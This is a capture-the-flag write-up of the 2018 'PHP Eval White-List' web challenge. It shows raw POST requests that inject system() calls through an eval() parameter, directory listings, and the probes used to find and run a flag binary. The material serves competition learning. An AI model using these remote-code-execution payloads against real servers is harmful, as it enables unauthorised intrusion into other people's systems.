Tags: web
Rating: 3.5
# ▼▼▼PHP Eval White-List(Web)192/586team solved=32.8%
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**
```
PHP was dangerous, so we've fixed it!
http://c67f8ffd.quals2018.oooverflow.io
Files:websec_eval_wl.so
```
---
**【Understanding function and access restrictions】**
http://c67f8ffd.quals2018.oooverflow.io
↓
```
PHP - Custom eval whitelisting!
PHP is dangerous, so we wrote a custom php extension to improve its security. We're also taking advantage of the open_basedir directive to prevent you from accessing the flag binary up the current folder. You can check the source of the page here.
```
↓
There are the following access restrictions
```
・custom php extension:websec_eval_wl.so
・open_basedir()
```
---
Also, source code is provided
↓
http://c67f8ffd.quals2018.oooverflow.io/source.txt
↓
```
<html>
<head>
<title>php as a service</title>
<link rel='stylesheet' href='bootstrap.min.css' />
</head>
<body>
<div id='main'>
<div class='container'>
<div class='row'>
<h1>PHP<small> - Custom eval
whitelisting!</small></h1>
</div>
<div class='row'>
PHP is dangerous, so we wrote a custom php extension to
improve its security. We're also taking advantage of the open_basedir
directive to prevent you from accessing the flag
binary up the current folder.
You can check the source of the page here.
<div class='container'>
./flag binary?';
}?>
↓
Arbitrary code is executable
`eval($_POST['d']);`
---
**【Information gathering by arbitrary code execution】**
```
POST / HTTP/1.1
Host: c67f8ffd.quals2018.oooverflow.io
Content-Type: application/x-www-form-urlencoded
d=system("ls -al");&submit=Run
```
↓
```
total 180
drwxr-xr-x 3 root root 4096 May 12 18:10 .
drwxr-xr-x 3 root root 4096 May 11 16:29 ..
-rw-r--r-- 1 root root 108376 May 5 04:58 bootstrap.min.css
-rw-r--r-- 1 root root 1672 May 12 18:09 index.php
-rw-r--r-- 1 root root 155 May 5 04:58 source.php
-rw-r--r-- 1 root root 1672 May 12 18:09 source.txt
d-wx-wx-wx 2 root root 16384 May 14 11:40 tmp
-rw-r--r-- 1 root root 33784 May 5 04:58 websec_eval_wl.so
```
↓
The `tmp` folder can be written, but I can exploit without using it
---
**【Identify the location of flag】**
TOP screen has the following description
`Can you execute the ./flag binary?`
---
I searched for an executable flag
× d= `system('file ./../../flag');` ⇒ `./../../flag: cannot open './../../flag' (No such file or directory)`
○ d= `system('file ./../flag');` ⇒ `./../flag: executable, regular file, no read permission`
× d= `system('file ./flag');` ⇒ `./flag: cannot open './flag' (No such file or directory)`
× d= `system('file ./tmp/flag');` ⇒ `./tmp/flag: ASCII text, with very long lines` ※This is a fake flag
---
**【exploit】**
d= `system(' ./../flag');`
↓
`OOO{Fortunately_php_has_some_rock_solid_defense_in_depth_mecanisms,_so-everything_is_fine.}`